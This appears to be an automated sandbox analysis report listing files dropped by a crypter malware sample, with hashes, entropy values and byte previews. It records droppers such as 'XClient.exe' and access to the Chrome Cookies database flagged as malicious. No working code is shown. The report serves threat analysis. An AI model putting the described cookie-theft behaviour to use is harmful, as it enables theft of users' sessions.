                                                                                                                                                                                                                SHA-256:93E28A5125B4864773F53D1C5F87C1756EFA0C2D60D5C3FD6B34AA920080F568
                                                                                                                                                                                                                SHA-512:DFAC8474BF7724B000A530B76152F75E146AE490D7F3D1F4960247226663EF738C88000A2B3C033BF626348DB4B33D7B26E0202B840052D80FF6C36BB8E089AA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview://(C) 2006 Forgesoft..//English language file for InstallForge.....[Main]..Title=<appname> Setup....[Gadgets]..NextBtn = Next >..CancelBtn = Cancel..BackBtn = < Back..FinishBtn = Finish..BrowseBtn = Browse.....AcceptOptn = I accept the agreement..DoNotAcceptOptn = I do not accept the agreement..CreateDesktopIconCbx = Create desktop icon..CreateStartMenuFolderCbx = Create start menu folder..LaunchProgramCbx = Launch..RebootCbx = Reboot computer now..DestinationFolderFR3 = Destination Folder..SelAppFolder=Select Application Folder:..SelStartMenuFolder=Select Start Menu Folder:....[Messages]..ExitSetupH = Exit Setup..ExitSetup = Do you want to abort the installation?..CouldNotExtractFileH = Error..CouldNotExtractFile = Could not extract file!....[Start]..Title = Welcome to the <appname> Setup Wizard..Text = This will install <appname> <appversion> on your computer. It is recommended that you close all other applications before continuing. Click Next to continue.....[LicenceAgreement]..Hea

                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):1.3280658133085501
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrb:KooCEYhgYEL0In
                                                                                                                                                                                                                MD5:760648B0465A876AD2863A5EF38729FC
                                                                                                                                                                                                                SHA1:B67B5A6B48EF5CBB359F1E3D4861F39B1F577219
                                                                                                                                                                                                                SHA-256:EA24B42F32CBD20B262353A4CA51CA817FD3484F9E1C89D3AA9AF76E3598FF2C
                                                                                                                                                                                                                SHA-512:62354DC599A8D262AA11B2194A77BFEFEF6FED29A87368EE1C6E20ED01C5D1999FF3C8DB2C5C170F83FF7BB81B1231B94C1C0432C8465B32829EC8C27F2FDEBB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd9436aa4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):0.422144123864384
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                                                                MD5:36DC6C6B64371DD5058B1DE9329F1F97
                                                                                                                                                                                                                SHA1:3B7E05FEA80CBA94CF50A5D3CCEC1BD7A15293BB
                                                                                                                                                                                                                SHA-256:BA5E8024CB0E76F3780420817FF8397DB47A443D4992462B9F00B2AE3682C00F
                                                                                                                                                                                                                SHA-512:D587A109CE487C1E54F53253B5783B4EB0BD1D5C792B4820F40C84DB0F3EB12C28F149A2665ACAAE9A295CEC61BFAE173437ED61AFB3AE6CB4DC8D65EF406663
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.Cj.... .......A.......X\...;...{......................0.!..........{A.:-...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................:-...|..................n*%.:-...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                Entropy (8bit):0.07686049360260126
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:B9tyYeoVRYGjjn13a/GaXtAllcVO/lnlZMxZNQl:YzsYGj53qGa9AOewk
                                                                                                                                                                                                                MD5:D2FB80E19F324F76EF77F8B2EA511D8C
                                                                                                                                                                                                                SHA1:2755698F75135B49C8A22FFCE2366F09788CF1DD
                                                                                                                                                                                                                SHA-256:DE24EE99EF80D40E15E90EE859638C3F85B7C1D43E949BE0E2E3365467200EE6
                                                                                                                                                                                                                SHA-512:9D0840F11078F89C570A5253DB8AF604121769EB4EF5C17E4731539189B3A26E66F9895F90C4D49CEF3D723CC6C1300429BD4019D69D4C3DC2B996D516BB4DB1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:]i.......................................;...{..:-...|.......{A..............{A......{A..........{A]................n*%.:-...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\D3DSCache\ab326b5a64fa2db7\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):65552
                                                                                                                                                                                                                Entropy (8bit):0.01267959957008888
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:JklGlll/l/lXp9ZjrPBY0Ll4lt/Qf1DP:q0dPBY0y4dz
                                                                                                                                                                                                                MD5:F82406D91DAD32A842033CE56EA73522
                                                                                                                                                                                                                SHA1:4864C2D6780FF0F8211C4A561EE90F76AE2840E0
                                                                                                                                                                                                                SHA-256:CF1AE0AB6FEB70464C9305F3355383B901CCBF0810F335ED5EA2FEB822C46638
                                                                                                                                                                                                                SHA-512:F340D5B65B840BF7C9699AEF837F2107F8204E2ADE706175C415576B049C00FFD97328B59C7F4EC3A51B27724A0C4AB1C0E3075B53A3C78B51B224947B13FEC3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:".7a........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\D3DSCache\ab326b5a64fa2db7\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                Entropy (8bit):1.5
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:R:R
                                                                                                                                                                                                                MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                                                                                                                SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                                                                                                                SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                                                                                                                SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:EERF

                                                                                                                                                                                                                C:\Users\user\AppData\Local\D3DSCache\ab326b5a64fa2db7\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                Entropy (8bit):0.03435668575671323
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:G9q0SbdlrYoWcV0Ndlg1IGiFTS2tGAYkAtD2Hrn:bpbdpYrNg1IlFoAzc2L
                                                                                                                                                                                                                MD5:16D388D094ECDC534C83C4403965A9F4
                                                                                                                                                                                                                SHA1:F18AC7E0A3D71E92B794DCE0A3832A119A45A4B7
                                                                                                                                                                                                                SHA-256:A982B3BE404EBC13123D18E30EF704FA7860379DFD77FE6C0427A43931D6FBC6
                                                                                                                                                                                                                SHA-512:D4502577A673595A8F3E63BA0F083090ECEF5AFF0EDC09FF5E84C8855ADE46955A1C62C216A7D3D790D7B1E21815365332ACCAB5CE8304A309A7D9534EB53333
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....................(....x:no.&A.e.u~+..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.W.e.b.V.i.e.w.\.A.p.p.l.i.c.a.t.i.o.n.\.1.1.7...0...2.0.4.5...4.7.\.m.s.e.d.g.e.w.e.b.v.i.e.w.2...e.x.e...........................(...p.DJ!.IL.....Zm.F............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):927
                                                                                                                                                                                                                Entropy (8bit):5.364163817184007
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzeRE4KoE4Tye:MxHKlYHKh3oRAHKzeRHKoHx
                                                                                                                                                                                                                MD5:A870F03168B188356C8FBC8D502E6A89
                                                                                                                                                                                                                SHA1:ABC920842CA8668B032F51C022FB73469D6629A2
                                                                                                                                                                                                                SHA-256:FD4C5A3EF3E80437E613914B88BFDC209997AF75A071DADB12C231E798DDB387
                                                                                                                                                                                                                SHA-512:2B2C56CC8307A680A6ACDA13267D94D5550FD6263C36DEC324A5F6DEA3606969DFE6C416F3D624DAAE30D8EFB709576FA3F81485725800196564CF59AF5348D9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WinUpdate.exe.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):621
                                                                                                                                                                                                                Entropy (8bit):5.345265452111628
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEniv:ML9E4KlKDE4KhKiKhRAE4KzeR
                                                                                                                                                                                                                MD5:9A0010B54E25DD22EC1D9FA3EA1AE6C2
                                                                                                                                                                                                                SHA1:830D8D4D0BD0544B1F25ECF4303C40479CF677C0
                                                                                                                                                                                                                SHA-256:B3D9F4BEFE0FF83AEC0AA7CCFB542E0B9CED36756FBA1BA863606969F3360F56
                                                                                                                                                                                                                SHA-512:6DEBC5BFC689C19AD8B72264FDD3710C93A2C2E5344E8024502B2D3E7554BC80381CE2A7BB4D560EB8F3E5E0C73195D07839651FE8CEA6E27F9A2674ABFF6691
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                Entropy (8bit):5.347482639021185
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                                                                                                                MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                                                                                                                SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                                                                                                                SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                                                                                                                SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):522
                                                                                                                                                                                                                Entropy (8bit):5.358731107079437
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                                                                                                                                MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                                                                                                                                SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                                                                                                                                SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                                                                                                                                SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                Entropy (8bit):3.839710316617697
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxzxl9Il8ud8rv8Lg0txuX2qKWcnX4VOhLd1rc:myYL8r8Lg0728nX4VOG
                                                                                                                                                                                                                MD5:93C99359C9FB072BF65832ADEF649911
                                                                                                                                                                                                                SHA1:DF7A4E6743A29FDBF7D29BF593EBC1C452679774
                                                                                                                                                                                                                SHA-256:DC0F4C19A6A88D64A7D516D86340E014A369C6C93D1077467EEF385DAAC238E3
                                                                                                                                                                                                                SHA-512:7696FFEADE79B33E5E946F6D31BCE7648F85D368BC1E4FEA6D82B06E27B4331C91B3944E33947BC6CF1C953E90CEE7A872351DADF32B539B0EC85657909DFE72
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.A.W.5.9.R.J.z.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.T.8.e.b.P.4.

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2232
                                                                                                                                                                                                                Entropy (8bit):5.315970117642257
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:YWSU4xymI4RfoUeW+gZ9tK8NPZHU97u1iMutgyI/gQUyuq1xf:YLHxvIIwLgZ2KRHOOumAqp
                                                                                                                                                                                                                MD5:BB989B4A51E23606264A4952B647B979
                                                                                                                                                                                                                SHA1:4E35D7B2EB57BEA5049F40BD3637629F1F31A324
                                                                                                                                                                                                                SHA-256:C5187A1CE18A140810DA97C81ECFDFED15C6B036932F404C695F0FB9EE6C15E3
                                                                                                                                                                                                                SHA-512:C3AA4B63D46350C391824A6A94E6BE9391BBF78CC8C48C4A7BB1175CE3813DCF77953B0E89D7222205F93E3FBCB0D5502A3F008472A7130C71DE8101280FC4C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:@...e.......................m.l.k.....>.?.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\9c99b8b7-b807-415a-ac6c-d0dc1a0c82f3.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 560 x 315, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):4287315
                                                                                                                                                                                                                Entropy (8bit):7.979377881255964
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:98304:3nVzOiicSEDZ1N38fikRWVjJHeR3Ik2vVddy61z54b6L99nBn9gK8lO:Fz2wnpVjJHY3dgddy6sYBnClO
                                                                                                                                                                                                                MD5:D4B17325DD4BBF0879AD874AD7324638
                                                                                                                                                                                                                SHA1:2E4174DCFF9153B5AB160BF9C4D7DC858B5AD967
                                                                                                                                                                                                                SHA-256:65FC9015AC8DE839FF6817A5005F72EF8D75A445571060B85EBF104ABB248183
                                                                                                                                                                                                                SHA-512:F3204982C281F485B81F5F6FAB760F3B49725ED8F625F1D55FA4DE24564FFFD96701462668355DECB22FC45D069BEA06F8FD94CEE9DA43B834E1B35143A9FA8F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...0...;.......K....$zTXtCreator....sL.OJUpL+I-RpMKKM.)..Az..jz......pHYs.........O%......PLTE...222..~.....................111...3339;?....% ...344<>B;=A./0......78<......000OPRwwwtyzggi;;<CEG......]^a...him%&'.....................')+.......#............~~....555.........>>>SSS...ABE.........888...*+.FGK...eeg..._`c......??C.....abe...W..XY\...............???UVZPQU...LMQ............[[^.. JKNu{|559...mnq..........klo........~.........stv... !#...TUW...||}......ppt..........*'.............."#&.........................ist......{......b[QTWkxy.....::=........................^ij.......................ITUw........,67!-.0;<bno...Yde...&12...a..^........ ..P[\.&'............T`a.....DNOn|}6FG......;........>JKL.....~..6ABb..C.....+........=.~?QS......m....[.....C.p.....3..YR........}_.nN.]J...)%~.......v..6rk.....B.U5.Ij........2~2..[..,..;.IDATx...O....!.3........V\_..j.s..).....8.(8g..B..J...T....R.........V..t..f.(.Nr$....T.R$....'/....RJBx>~.."c

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3178277
                                                                                                                                                                                                                Entropy (8bit):7.914678146803296
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:98304:va5GYryGYrMtWBJHU74Z9wqKOButZoGza:S5HGH8ob9wrZ7oGza
                                                                                                                                                                                                                MD5:C9C01FDC7D3AD84CEEB43C6B099A8AD5
                                                                                                                                                                                                                SHA1:2E7A67B2DD1A9BB2AD530A76868EC1636612C294
                                                                                                                                                                                                                SHA-256:F811DADCD0EC744B5927F4EB6B100BBEC8C6F03C13218BDDE25FA0F8A8FED056
                                                                                                                                                                                                                SHA-512:B58BE960EF3219FB0E9BA3A533DD1B26861EB7300526FBD3761EE21CFBFA77B86AC969FFF6EAAAF97B8B573AE684113E3DEB39A8C4A85C6CD7EA4F67A8386836
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tN.W...............2.....................0....@..........................@..........................................................@h...........................................................................................................code............................... ..`.text...,........................... ..`.rdata...T...0...V..................@..@.data....3....... ...n..............@....rsrc...@h.......j..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{0E375487-F438-46CC-BEFB-A232FC480193}\Desktop.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):75
                                                                                                                                                                                                                Entropy (8bit):4.197209073300621
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWi14jZY6xA4vXyU4jZY6E:YWicZY69XsZY6E
                                                                                                                                                                                                                MD5:F97AF9F76317A164E194D2ADB9A79F4A
                                                                                                                                                                                                                SHA1:A793EF80CA4620916FB0FF938A61C087E0794B75
                                                                                                                                                                                                                SHA-256:E96B37868F42BE735C6D9CD8FE937C154E3D93DC43A653DBCD1200937B6C1918
